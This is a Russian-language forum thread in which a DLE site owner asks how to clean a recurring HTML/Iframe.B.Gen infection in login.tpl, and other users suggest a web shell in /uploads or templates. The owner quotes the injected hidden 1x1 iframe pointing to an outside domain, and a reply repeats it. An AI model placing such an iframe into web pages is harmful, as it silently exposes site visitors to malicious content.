HTML/Iframe.B.Gen и DLE

zerto2
На сайте с 17.02.2011
Offline
52
1890

Недавно на сате обнаружился

HTML/Iframe.B.Gen вирус

Вирус прописывается в login.tpl и заражает версии движка от 8,5 до 9,2

Нашел его, вырезал код черех хтмл редактор, сменил пароль от админ и сам адрес админки, поменял пароль от фтп, через неделю снова обнаружил зловредный код.

Кто сталкивался с подобным? Как лечить? где он прячется? в базе? В каком то из исполняемых php фалов?

Буду рад любому совету

zerto2 добавил 29.11.2011 в 00:21

Вот код который прописывается в tpl

<iframe src="http://liveeent.dyndns.biz/" width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

ps поисском по серчу не нашел нужной информации

^^
Fabio
На сайте с 17.07.2008
Offline
126
#1

Вы же говорите, что вырезали. Значит на какое-то время он исчезал? Следовательно, через ту же самую дыру и проник снова.

А периодически он может появляться, как известно, ДЛЕ довольно дырявый движок.

zerto2
На сайте с 17.02.2011
Offline
52
#2

Да какое то время его не было.

Думаю кто то еще сталкивался с такой проблемой, вот и хотелось бы вместе обнаружить эту дырку.

Fabio
На сайте с 17.07.2008
Offline
126
#3
zerto2:
Да какое то время его не было.
Думаю кто то еще сталкивался с такой проблемой, вот и хотелось бы вместе обнаружить эту дырку.

Я сталкивался, но на Джумле. Тут есть люди, которые отлавливают такие вирусы и дыры, в т.ч на ДЛЕ. Не помню ников, может кто-нибудь откликнется, поищите. Удачи.

R
На сайте с 24.01.2008
Offline
180
#4

Стучите в асю поможем!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
G
На сайте с 12.04.2008
Offline
101
#5
zerto2:
Недавно на сате обнаружился
HTML/Iframe.B.Gen вирус
Вирус прописывается в login.tpl и заражает версии движка от 8,5 до 9,2
Нашел его, вырезал код черех хтмл редактор, сменил пароль от админ и сам адрес админки, поменял пароль от фтп, через неделю снова обнаружил зловредный код.
Кто сталкивался с подобным? Как лечить? где он прячется? в базе? В каком то из исполняемых php фалов?
Буду рад любому совету

zerto2 добавил 29.11.2011 в 00:21
Вот код который прописывается в tpl
<iframe src="http://liveeent.dyndns.biz/" width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

ps поисском по серчу не нашел нужной информации

Значит шелл есть. Нужно смотреть пациента

Продажа сайтов (/ru/forum/866932) под Amazon и AdSense
[Удален]
#6

Просмотри папки /uploads и templates . Скорее всего у тебя там shell ☝ И если он там есть, это тоже не решит твою проблему... В общем правильно сказали выше, смотреть нужно. Граббер ни какой не устанавливал?

zerto2
На сайте с 17.02.2011
Offline
52
#7

Спасибо всем за советы )

ps за первый пост мне влепили - 86 репы, это тут так тепло встречают новичков? (

zerto2 добавил 01.12.2011 в 19:14

Нет никаких граберов и левых дополнений не ставил

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий